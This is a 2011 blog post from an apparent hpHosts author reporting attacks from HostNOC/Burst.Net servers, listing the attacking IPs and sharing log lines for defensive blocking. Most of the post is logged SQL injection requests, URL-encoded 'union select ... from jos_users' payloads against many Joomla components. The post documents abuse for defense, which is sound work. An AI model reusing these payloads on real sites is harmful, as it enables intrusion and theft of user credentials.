Blog for hpHosts, and whatever else I feel like writing about ....

Friday 9 December 2011

Dear HostNOC - your servers are attacking a friend!

I am assisting a friend at present, with an issue involving IPs constantly attacking his servers, and noted during one of his recent updates, that alot of them were HostNOC - turns out, there's quite the list of them (ignoring the others from known criminal networks). All are RFI etc, and all are already being blocked by ZBBlock (a script written by my friend Zaphod).

The problem here, is HostNOCs (aka Burst.Net) lack of ability in both detecting malicious traffic originating inside their own network, and the sheer amount of frustration in dealing with their abuse department, both via e-mail, and via phone.

I'm in the midst of determining whether these are dedicated criminal servers, or compromised servers (I'm already aware of several black hat "hosts" that have space within HostNOC/Burst IP space, most of course, being run by kids that frequent hackforums.net and the like), but in the meantime, for those of you that want the list of IPs and see what they're doing, the following is the log data for them;

Date    IP    PTR    Attack Pattern
09/Dec/2011:07:21:07 -0600]    173.212.195.142    173-212-195-142.static.hostnoc.net    GET /index.php?option=com_simpleshop&Itemid=41&cmd=section§ion=-000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F000%2C111%2C222%2C0x33633273366962%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:14:26:38 -0600]    173.212.195.142    173-212-195-142.static.hostnoc.net    GET /index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:09:46:07 -0600]    173.212.197.54    mail.wizzsolutions.com    GET /index.php?option=com_quiz&task=user_tst_shw&Itemid=61&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:07:30:58 -0600]    173.212.209.228    173-212-209-228.static.hostnoc.net    GET /index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C2%2C3%2C4%2C5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:07:55:00 -0600]    173.212.209.228    173-212-209-228.static.hostnoc.net    GET /index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:15:56:02 -0600]    173.212.209.228    173-212-209-228.static.hostnoc.net    GET /index.php?option=com_musica&Itemid=172&tasko=viewo&task=view2&id=-4214%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:08:48:52 -0600]    173.212.209.244    air2.jetthost.net    GET /index.php?option=com_propiedades&task=search&id_provincia=0%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:15:32:46 -0600]    173.212.227.12    173-212-227-12.static.hostnoc.net    GET /index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C2%2C2%2C2%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:10:03:34 -0600]    173.212.227.38    fusionswift.com    GET /index.php?option=com_most&mode=email&secid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0000%2C0x33633273366962%2C2222%2C3333%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:11:00:37 -0600]    173.212.227.38    fusionswift.com    GET /index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:13:45:23 -0600]    173.212.227.54    173-212-227-54.static.hostnoc.net    GET /index.php?option=com_kbase&view=article&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:15:56:56 -0600]    173.212.235.34    srvs.us    GET /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:12:12:43 -0600]    173.212.235.62    173-212-235-62.static.hostnoc.net    GET /index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C10%2C11%2C0%2C0%2C14%2C15%2C16%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:10:58:41 -0600]    173.212.254.12    173-212-254-12.static.hostnoc.net    GET /index.php?option=com_mad4joomla&jid=-2%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:18:54:31 -0600]    173.212.254.12    173-212-254-12.static.hostnoc.net    GET /index.php?option=faq&task=viewallfaq&catid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:18:35:28 -0600]    173.212.254.44    platon.yapitasi.com    GET /index.php?option=com_directory&page=viewcat&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:14:03:06 -0600]    64.191.99.110    64-191-99-110.static.hostnoc.net    GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0%2C0x33633273366962%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:11:21:46 -0600]    64.191.99.120    64-191-99-120.static.hostnoc.net    GET /index.php?option=com_omnirealestate&Itemid=0&func=showObject&info=contact&results=joomla&objid=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:16:48:42 -0600]    64.191.99.120    64-191-99-120.static.hostnoc.net    GET /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C0x33633273366962%2C5%2C6%2C7%2C8%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:14:43:25 -0600]    66.197.227.156    66-197-227-156.static.hostnoc.net    GET /index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C0x33633273366962%2C0x33633273366962%2C5%2C6%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:18:51:31 -0600]    66.197.227.156    66-197-227-156.static.hostnoc.net    GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:09:29:10 -0600]    66.197.227.170    66-197-227-170.static.hostnoc.net    GET /index.php?option=com_gallery&Itemid=0&func=detail&id=-99999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:12:46:14 -0600]    66.197.227.185    cybersyn.tuonda.es    GET /index.php?option=com_mambads&Itemid=0&func=detail&cacat=0&casb=0&caid=100500%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:12:52:30 -0600]    66.197.227.185    cybersyn.tuonda.es    GET /index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:16:24:45 -0600]    66.197.227.185    cybersyn.tuonda.es    GET /index.php?option=com_rapidrecipe&category_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:12:05:34 -0600]    96.9.173.40    96-9-173-40.static.hostnoc.net    GET /index.php?option=com_rsgallery&page=inline&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C10%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:13:59:52 -0600]    96.9.173.48    96-9-173-48.static.hostnoc.net    GET /index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C1%2C2%2C3%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:17:43:44 -0600]    96.9.173.58    96-9-173-58.static.hostnoc.net    GET /index.php?option=com_jmovies&Itemid=29&task=detail&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1


The plain IP list;

173.212.195.142
173.212.197.54
173.212.209.228
173.212.209.244
173.212.227.12
173.212.227.38
173.212.227.54
173.212.235.34
173.212.235.62
173.212.254.12
173.212.254.44
64.191.99.110
64.191.99.120
66.197.227.156
66.197.227.170
66.197.227.185
96.9.173.40
96.9.173.48
96.9.173.58


This of course, doesn't cover the rest of the malicious content across HostNOC/Burst IP space - but that's for another time.

1 comment:

redwolfe_98 said...

here is a related post:

http://stopmalvertising.com/security/with-love-from-hostnoc.html